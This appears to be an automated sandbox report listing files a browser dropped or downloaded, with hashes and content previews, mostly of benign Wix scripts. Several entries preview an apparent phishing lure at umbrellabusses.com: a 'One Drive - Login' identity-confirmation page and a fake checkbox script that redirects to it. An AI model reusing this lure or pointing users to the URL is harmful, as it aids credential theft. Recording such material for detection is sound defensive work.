                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.......fc..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I*Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............=......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 12:52:29 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                                        Entropy (8bit):3.990053887679568
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:8dd6TGKsDHGidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbEy+yT+:8qDkT/TbxWOvTbEy7T
                                                                                                                                                                                                                        MD5:9DBBA6AF4F0E9FB09C6A489C502C93C7
                                                                                                                                                                                                                        SHA1:63537BD463256EB9B5B34445B6A3EA052D5640CA
                                                                                                                                                                                                                        SHA-256:34F7B99B642488C6EEFC32DF9659680A3FF54A29898DA3E32B9A62D79AA38CB3
                                                                                                                                                                                                                        SHA-512:37A27F0AE3602E751FF544918AB97A04F5FDDEDB2E5091B01707CA3CD8AF56DD87B840699C7FD6374AC8C0F3325B4503858A70E47917FC62B59CA317B0256E28
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,........fc..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I*Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............=......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 406 x 529, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):95611
                                                                                                                                                                                                                        Entropy (8bit):7.98479144957383
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:HpnxBUUsCBVcocWD2nyg3MrO9BIqM52G65v9p7+wmNmVY1EdfwYMKT/gtCo:tUUsOchU2R3MSIq42J9pamddYLyS
                                                                                                                                                                                                                        MD5:68A6D84DAE4D70CA2B1F06749F09A78F
                                                                                                                                                                                                                        SHA1:3084F368844DB89A8C9E41134ECA078E91978A7E
                                                                                                                                                                                                                        SHA-256:73C7607F0C60A4B399446E1018929EA1BBD7D649938D732B95D9521B757E6E4B
                                                                                                                                                                                                                        SHA-512:6B8D5BC56BF5510EA78E5B1CBAF1240286E558AF4DA5F2BDCCC8EA0DD35C8EA2F1329596EFDD994D40E2E1C2E8A9705517B729677877CB22E353A7A4358CFD08
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:.PNG........IHDR.............i..k....sRGB....... .IDATx^...%U.6..s*....D...b.."I.E...8.. ...=..o...n4.......D......0L.=..............t.L...}O=3O....s...K.Am....B@!...E..,.K.J!..P.(...P...B@!..P..*..Xf.Nu2..B@!..P..B@!..P..*..Xf.Nu2..B@!..P..B@!..P..*..Xf.Nu2..B@!..P..B@!..P..*..Xf.Nu2..B@!..P..B@!..P..*..Xf.Nu2..B@!...ubY.~.f.X.<..*T*..`6Ms.Z.1$...2.W.H.6o...M....u}.........I.3.X...C..gs<................_......;.......4]k..k.&.?M.0..93..AL.3.L.w...Moz.......-..f."...{....M...... ...z.i<..qF.x..3....Lc....`L..b..3.F...q.(..d...q,.!.K$h....{yB.._...cQ.|.7c.8..<F.....7..,..H...+.;.8..>....M.oz..`..s~O..k..&8.......h.'..q.&L..O.6.x.......@.....M.+=.....U.}..@+.....K.>..=z.d....i\..y.<t.>.6.6.^c..d~..kZGc......`a.sp.Y.q&.@.8x.L'......h.....Q%...a.z...X...}..SL....B`Z.BV..ke..86.....D.....-KF..B../.3.`.....$@d".gck.i}.BO...h....{..~..@...&..fb...S....y..j....$.p........y....pLSa9!qOu..=y,.m..L..............M......`!...~:..$..K.1F..$y..8..8..
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (688)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):805
                                                                                                                                                                                                                        Entropy (8bit):5.416474889124371
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:z/kH0QfYi/eFfo9mrkwNXqwOLmXrMLXrn/e2ZaFPLkgw:U00zacqkiXJXqXTecOjS
                                                                                                                                                                                                                        MD5:E65B3E16D1790E074ABFD552358F79A2
                                                                                                                                                                                                                        SHA1:7FA9E0399CE9E9EB824F05E191A58700F03D7A2F
                                                                                                                                                                                                                        SHA-256:BD20169FD826981686DF7F087AE1EBF629ED1A4000490FC108331FB28A6583BD
                                                                                                                                                                                                                        SHA-512:AFA756E23123BD7AB6D7DCE0474A56A4A0D693F5EEC1BCF1191B50EF9C4129817F7F26694748B7BDADAAD7D5888468EC0D5110A74F5F73697843B633702255C3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/group_36.dabdc384.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[9896],{94109:(e,s,n)=>{n.r(s),n.d(s,{page:()=>u});var o=n(62155),a=n.n(o),p=n(77748),t=n(20590),i=n(478),l=n(9858),d=n(69434);const c=(0,p.Og)([(0,p.KT)(t.Gp,l.U),i.e],((e,s)=>({name:"onloadCompsBehaviors",pageWillMount(){const{compsBehaviors:n}=e,o=(0,d.N)({isResponsive:!0}),p=(0,d.N)({isResponsive:!1}),t=a().mapValues(n,(({collapseOnLoad:e,hiddenOnLoad:s,isResponsiveComponent:n})=>{const a=n?o:p,t={};return e&&Object.assign(t,a.getCollapsedStyles()),s&&Object.assign(t,a.getHiddenStyles()),t}));s.update(t)}})));var r=n(16537);const u=e=>{e(r.$.PageWillMountHandler).to(c)}}}]);.//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/group_36.dabdc384.chunk.min.js.map
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (25431)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):25545
                                                                                                                                                                                                                        Entropy (8bit):5.283934807984521
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:YzQKTfF3tdx9BDic5LsXeQds9R7QCGQOa4Sbs+J6dO9JtpR940jcYKu/d9r4yjVG:mJtj9w5sBsc9fr9nR9NLI
                                                                                                                                                                                                                        MD5:3420CFF8BF368157EF7C715BE4697C42
                                                                                                                                                                                                                        SHA1:12A8368B5E5D6A713342F878A644E1E76D9E1104
                                                                                                                                                                                                                        SHA-256:69DF0473F3ED7A6228FCF880A740F9D7FA2C1F8521F798753FB29DB4272D0485
                                                                                                                                                                                                                        SHA-512:C14726D5ABD32A755D194146B228A703CF5C59BEC59B3717531796ECAE40A441A68987F0493F5082B4E4A910E98F78302DD62500D9B35CE25A84D82E219F0E0A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/8875.46b20782.bundle.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[8875],{58223:(e,t,i)=>{i.d(t,{Rr:()=>x,Aq:()=>h,p7:()=>v,jh:()=>R,EH:()=>$,KU:()=>l,_o:()=>a,vk:()=>d,NL:()=>y,yO:()=>g});var n=i(17709),s=i.n(n);const r=(e,t,i)=>{let n=1,s=0;for(let r=0;r<e.length;r++){const o=e[r];if(o>t)return!1;if(s+=o,s>t&&(n++,s=o,n>i))return!1}return!0},o=(e,t,i)=>{let n=-1/0;const s=e.map((e=>(e.height+t>n&&(n=e.height+t),e.height+t)));let o=n,a=n*e.length,l=n;for(;o<a;){const e=Math.floor((o+a)/2);r(s,e,i)?a=e:o=e+1,l=o}return l-t};function a(){class e extends HTMLElement{constructor(){super(...arguments),this.containerWidth=0,this.isActive=!1,this.isDuringCalc=!1,this.attachObservers=()=>{this.mutationObserver?.observe(this,{childList:!0,subtree:!0}),this.containerWidthObserver?.observe(this),Array.from(this.children).forEach((e=>{this.handleItemAdded(e)}))},this.detachHeightCalcObservers=()=>{this.mutationObserver?.disconnect(),this.containerWidthObserver
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):3784
                                                                                                                                                                                                                        Entropy (8bit):3.846100445814444
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:lPRCulPt4QwpDtpg1I+wB8oCjLLOH3QnZOWPoYnvgkLOfgqUkUHTNfpXqgRqOxpT:BFh9EDtpOwOoYLwQgAYYHXq8ZRgK
                                                                                                                                                                                                                        MD5:52691A7D143719ECA19E82551DC4C68E
                                                                                                                                                                                                                        SHA1:813D6910B5417998B111092526423B5280551AFE
                                                                                                                                                                                                                        SHA-256:DF39BC1D93AC453AD840AD1253FD299018C8156FAECF539427BF476DF2414B76
                                                                                                                                                                                                                        SHA-512:DB549A8F496ED49E0719ED2AAA51E477AF5EAE89977F02B773941DCE2963C21102894DBBDBE1B890362A764D06BCD8215E730CBB01CC87C80F2B2F9E438EE593
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/auth/
                                                                                                                                                                                                                        Preview:....<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>One Drive - Login</title>.. <link rel="stylesheet" href="../css/main.css">.. <style>.. .. </style>..</head>..<body>.... <div class="container">.. <div class="headbox"></div>.... <div class="containerBox">.. <div class="logBox"></div> logo box without img -->.... <div class="mainContainer">.... <div class="conBox">.. <h1>Confirm Your Identity</h1>.. </div>.... <div class="conBox2">.. <div class="textConp">.. <p>You have received a secure link</p>.. </div>.... <div class="pfBox">.. <div class="pfImg"></div> PDF icon box without img -->.... <div class="pfText">..
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2768)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):2942
                                                                                                                                                                                                                        Entropy (8bit):5.207735632323389
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:YozXUSGLSWdBjuPgUXyXAGxTu2TZYgkfu92blKYcjFVnGNFDFkf0WTI0FeX7hK5:3XUrL3ds4UCNctfjZ0RGXZ20WTIMeLhk
                                                                                                                                                                                                                        MD5:3D1D851128E88481BF4FE055902E792A
                                                                                                                                                                                                                        SHA1:4457A1BBC9765FCB1F9C7E8FE8AAE415359D314F
                                                                                                                                                                                                                        SHA-256:79251DF39F985CE0F2D252349098427F59CD586B5465B4C13C5D5F9396487FAB
                                                                                                                                                                                                                        SHA-512:5D1992A0995FA8402C55748F9B39B8F688DD87CCA840D88E7E9D8416E389C9C487BC840F74AEBB32398311F4665AB8C2705635B3B42EB744F69A86603F7CD3BC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[FiveGridLine_SolidLine].b91bad1d.bundle.min.js
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[FiveGridLine_SolidLine]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[FiveGridLine_SolidLine]"]=t(require("react")):e["rb_wixui.thunderbolt[FiveGridLine_SolidLine]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t(){return e.exports=t=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)({}).hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(null,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports}},r={};function n(e){var o=r[e];if(void 0!==o)return o.exports;var i=r[e]={exports:{}};return t[e](i,i.exports,n),i.exports}n.n=function(e){var t=e&&e.__esMod
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):256611
                                                                                                                                                                                                                        Entropy (8bit):5.356229019788686
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:T8i5K3QBWm8V8QDOjQPM+TJNzk/EVKPuP7v3tI/P6LZufpZH4Bj5BJSNEbuTBAi1:T8i5Kbm8Vl4Qkel6Pu/s0Q
                                                                                                                                                                                                                        MD5:26D6313E82616D92F887AEFCDEB4C6DB
                                                                                                                                                                                                                        SHA1:69C2817B9659FBC23AE08CD6B8EDAC6FE51D18DB
                                                                                                                                                                                                                        SHA-256:C7FC74125FFE0DBD5A0736578B7714CA6DE0BE0EA9BF80605231B30C3AF585A8
                                                                                                                                                                                                                        SHA-512:6F000CFC8AAEFEC03A2AF3D675A8B85AB06C905848FCA01EAC355F10E67AFFECF65019CE100C6D90CBC474BD0C74B008CD650A8B0F68DAE6AF1D40F7FD717BB4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[4017,8792],{47795:(e,t,r)=>{"use strict";r.r(t),r.d(t,{ConsentPolicyAccessor:()=>f});var n,o={policy:"getCurrentConsentPolicy",header:"_getConsentPolicyHeader",isMethod:!0},i={policy:"consentPolicy",header:"consentPolicyHeader",isMethod:!1},a={essential:!0,dataToThirdParty:!0,advertising:!0,functional:!0,analytics:!0};function s(){return window}function c(){return self}function u(){return r.g}function l(){return globalThis}function d(e){var t;void 0===e&&(e=void 0),e&&(n=e),n||e||[l,u,c,s].forEach((function(e){try{n||(n=e())}catch(e){}}));try{"object"==typeof n.commonConfig&&n.commonConfig.consentPolicy&&(t=p(n.commonConfig,i)),t||"object"!=typeof n.consentPolicyManager||(t=p(n.consentPolicyManager,o)),t||"object"!=typeof n.Wix||"object"!=typeof n.Wix.Utils||"function"!=typeof n.Wix.Utils.getCurrentConsentPolicy||(t=p(n.Wix.Utils,o))}catch(e){}return t}function p(e,t){return{getCurrentConsentPoli
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1223)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1352
                                                                                                                                                                                                                        Entropy (8bit):5.235577373009787
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:z/kGxbyoFiAZWDUT66JxNlZZfYTYQDRFzmQDRF+26Ay+HycRdrmDZRZYaHZYV+Sm:viWWDM66FRwbXz9XFUJcPmRZvZi+SNw7
                                                                                                                                                                                                                        MD5:A032340B7D80E2F00882B993C262B01F
                                                                                                                                                                                                                        SHA1:EC69BC6C33540F96E445182580A7A11276C62EEF
                                                                                                                                                                                                                        SHA-256:540285A72576C8849036EBD78FF6F49B68761D21F5BA140D9E35D03603A9348A
                                                                                                                                                                                                                        SHA-512:2AF7ED4259D39F242CF392FC166FD719A13DBC15D91A8DA7A107100E3806A3B6A9C17A0F2D21766BB4850B558E9511B386E7A75CFB7F873B5A8332F1261B240A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/triggersAndReactions.e7bf7036.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[693],{36655:(t,o,r)=>{r.d(o,{f:()=>i});var n=r(17709),e=r.n(n);const s=(t,o)=>o?t.scrollLeft:t.scrollTop,l=(t,o,r)=>{const n=s(t,r),e=((t,o)=>o?t.scrollWidth:t.scrollHeight)(t,r),l=((t,o)=>{const r=t.getBoundingClientRect();return o?r.width:r.height})(t,r),i="forward"===o?1:-1,{minScrollPosition:c,maxScrollPosition:a}=((t,o,r)=>{const n=r?"left":"top",e=s(t,r);t.scrollTo({[n]:o,behavior:"instant"});const l=s(t,r);t.scrollTo({[n]:0,behavior:"instant"});const i=s(t,r);return t.scrollTo({[n]:e,behavior:"instant"}),{minScrollPosition:i,maxScrollPosition:l}})(t,e,r);if(Math.trunc(n)<=c&&"backward"===o)return e;if(Math.trunc(n)>=a&&"forward"===o)return 0;const h=n+i*l;return h+l>e?e:h<0?0:Math.round(h)},i=(t,o,r)=>{const n=t.containerProps?.overlowWrapperClassName||t.responsiveContainerProps?.overlowWrapperClassName;if(!n)return;const s=window.document.getElementById(o).getElementsByClassN
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (28627)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):49944
                                                                                                                                                                                                                        Entropy (8bit):5.438406261909306
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:tHHklIK8fNDDyiZIN7g2+FfM+rUCjAdsY8145SXBhonQSOZGPTRmAs2PqDuHM5z6:rq8dM+wsbi3jRF4+bH2fKmuEvMH
                                                                                                                                                                                                                        MD5:089A2F90EDF2B72A82054FF2DBC394FF
                                                                                                                                                                                                                        SHA1:E5C2DFCFE1136C8A3630FE57DC231DE42960A85D
                                                                                                                                                                                                                        SHA-256:B3FA46F6A8A3E06E28A9FAB80A240BA8C79C72A550E6030988AC197C477815C6
                                                                                                                                                                                                                        SHA-512:B77DA570A3932C5AFA6D8571849E3EE1574C09C34818DB5381300C8000DBCEBBD1586FF844863D3A5F945E390EC20D99859553A95E5E227165167A261601DA2B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/group_2.484922c1.chunk.min.js
                                                                                                                                                                                                                        Preview:(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[851],{31124:()=>{(()=>{var e={212:./*!*******************************************************************!*\. !*** ../../node_modules/@babel/runtime/helpers/defineProperty.js ***!. \*******************************************************************/(e,t,n)=>{var r=n(/*! ./toPropertyKey.js */347);e.exports=function(e,t,n){return(t=r(t))in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e},e.exports.__esModule=!0,e.exports.default=e.exports},878:./*!****************************************************************!*\. !*** ../../node_modules/@babel/runtime/helpers/toPrimitive.js ***!. \****************************************************************/(e,t,n)=>{var r=n(/*! ./typeof.js */319).default;e.exports=function(e,t){if("object"!=r(e)||!e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var o=n.call(e,t||"default");if("object"!=r(o))return o;throw
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):544
                                                                                                                                                                                                                        Entropy (8bit):4.804864965496654
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:tdwQdd4bdu889SW71W+ZFq1MCW71WCnxH7A1WPWQZNk:XBoh8FW1Mp4
                                                                                                                                                                                                                        MD5:1EF785F73AA281B7D101CC2C4B0914E5
                                                                                                                                                                                                                        SHA1:1CB069DCEE14E0450E90394AAA4C14893798ACB3
                                                                                                                                                                                                                        SHA-256:E32A78CB5F40778B7C8E0DE6A0F2C8FDA4C8E73D8D7BE98502976CEB1A6242CF
                                                                                                                                                                                                                        SHA-512:06E98E7A4D9C3E78FF5267BB49763B170FEA0B9B7588CD8A468CDEFD77A057CA1F378C87D943C647FE3A98A28231B20B3A4723D6BD24478C1359B2A2F0D8C0FA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/js/check.js?v=1736517172
                                                                                                                                                                                                                        Preview:const rb = document.querySelector(".rb");..const rblab = document.querySelector(".rblab");..const rbo = document.querySelector(".rbo");....rb.addEventListener("change", () => {.. rb.classList.add("close");.. rbo.classList.remove("close");.. rblab.textContent = "Success"; .. rbo.src = "./img/good.png";.. rb.classList.add("close");.... setTimeout(() => {.. window.location.href = "./auth/".. rbo.classList.add("close");.. rb.classList.remove("close");.. rblab.textContent = "Success";.. rb.checked = false;.. }, 500);..});
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1188)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1303
                                                                                                                                                                                                                        Entropy (8bit):5.4152936437291554
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:z/kma0CwT2BLQZDRFSEYTDC3/TLd71X6V4RFoFpKDAt9cB/WHp/h3xRRXkgjY:lCBBLQReT+7LdhXboFpKDAt9cB2h3nRq
                                                                                                                                                                                                                        MD5:2A76B438980C3B70FF11F9C7903FB226
                                                                                                                                                                                                                        SHA1:BAB9805D48792C2564B5F9439386AED772F4E366
                                                                                                                                                                                                                        SHA-256:C893B85124C764FA7604430413FD6A523EF58200284095EA0ECD25DA5E2768CE
                                                                                                                                                                                                                        SHA-512:2F735EC43C5B62D691DD389B9A055B7410E955586E5539C8FB0D181F01F1CA0A969770AA94D65D99A31BCA795283A966DC14D2035DF4402DBA4D12ECB56B92B2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/router.478f8b95.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[5148,5652,6521],{19025:(t,e,n)=>{n.d(e,{Lm:()=>r,My:()=>w,Og:()=>c,QJ:()=>h,Qx:()=>v,V8:()=>_,_d:()=>o,ak:()=>a,ii:()=>i,lD:()=>s,lH:()=>d,rE:()=>m,vh:()=>u});const s=/mailto:([^?]+)(\?(.*))?/,r=/^tel:(.*)/,a=/^\/([^ ?#]*)?[#]?([^ ?#]*)[?]?(.*)/,p=/^#([^ ?]*)[?]?(.*)/,l=/^(http|https):\/\/(.*)/,o=/^wix:document:\/\/v1\/(.+)\/(.+)/,c=/^document:\/\/(.*)/,i=t=>r.test(t),d=t=>t.startsWith("https://api.whatsapp.com/send?phone="),h=t=>s.test(t),_=t=>o.test(t)||c.test(t),u=t=>l.test(t),m=t=>a.test(t),w=t=>p.test(t),v=t=>["SCROLL_TO_TOP","SCROLL_TO_BOTTOM"].includes(t)},91500:(t,e,n)=>{n.d(e,{S6:()=>r,qq:()=>i,qw:()=>s,vP:()=>d});const s=(t,e)=>r(t,e).relativeEncodedUrl,r=(t,e)=>{const n=a(t,e),s=p(n);return{relativePathnameParts:s,relativeUrl:l(s),relativeEncodedUrl:l(o(n))}},a=(t,e)=>{const n=new URL(t,`${e}/`),s=new URL(e);return n.pathname.replace(s.pathname,"")},p=t=>{const e=c(t);retu
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):66257
                                                                                                                                                                                                                        Entropy (8bit):5.448346154298007
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:k7hCp95VCe92nCIGArg6B1NN9GauHP4o+fCYunqum5RJoIx3tNclc8k+vo64T8Ym:WhBClArg6B1NN9GrUuN1Xu/uai6RIVLl
                                                                                                                                                                                                                        MD5:8433DFE4F0FD3AAFFBF78372EA84D466
                                                                                                                                                                                                                        SHA1:40FF8180DFC36C48EA8F14785BFCF573437601A2
                                                                                                                                                                                                                        SHA-256:0E18D298C74CF09795D8B953C952A9E63B3497A88FA60DC168E1056EAEC5ED72
                                                                                                                                                                                                                        SHA-512:11E499946BCDE208044FC52CCF1D3FB06987BC6D69FE6FB8F59B05A86BBA4668DF180198528970DE8EE53C95AA92D6A80BB4E53CE62D1CC75FEFDB5DDE798C96
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react"),require("react-dom")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt_bootstrap",["react","reactDOM"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt_bootstrap"]=t(require("react"),require("react-dom")):e["rb_wixui.thunderbolt_bootstrap"]=t(e.React,e.ReactDOM)}("undefined"!=typeof self?self:this,(function(e,t){return function(){var n={27232:function(e,t,n){var a=n(82016);e.exports=a.create("StylableButton2545352419",{classes:{root:"StylableButton2545352419__root",label:"StylableButton2545352419__label",link:"StylableButton2545352419__link",container:"StylableButton2545352419__container",icon:"StylableButton2545352419__icon"},vars:{},stVars:{},keyframes:{},layers:{}},"",-1,e.id)},82016:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.createRenderable=t.create=void 0;t.create=function(e,t,n,a,r,i){const o={namespace:e,classes:t.class
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34973)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):35145
                                                                                                                                                                                                                        Entropy (8bit):5.569331133720632
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:HL9d6HMRTmporjNkcEgQ1Js+ewi6Ac52Ptj5+dIuXuIV9plgOOPAAziN7itdLv:hvhMWcdIXUzN0Lv
                                                                                                                                                                                                                        MD5:A17384FC2F4B6159C47793DBC8E9AB63
                                                                                                                                                                                                                        SHA1:3A0DED11D1DD7B2678A298725ED2D8EA481323B6
                                                                                                                                                                                                                        SHA-256:394AAF357BD55CF18278F5BF3E2404C8B54AAF901FE060524BF7BCDF85FE3195
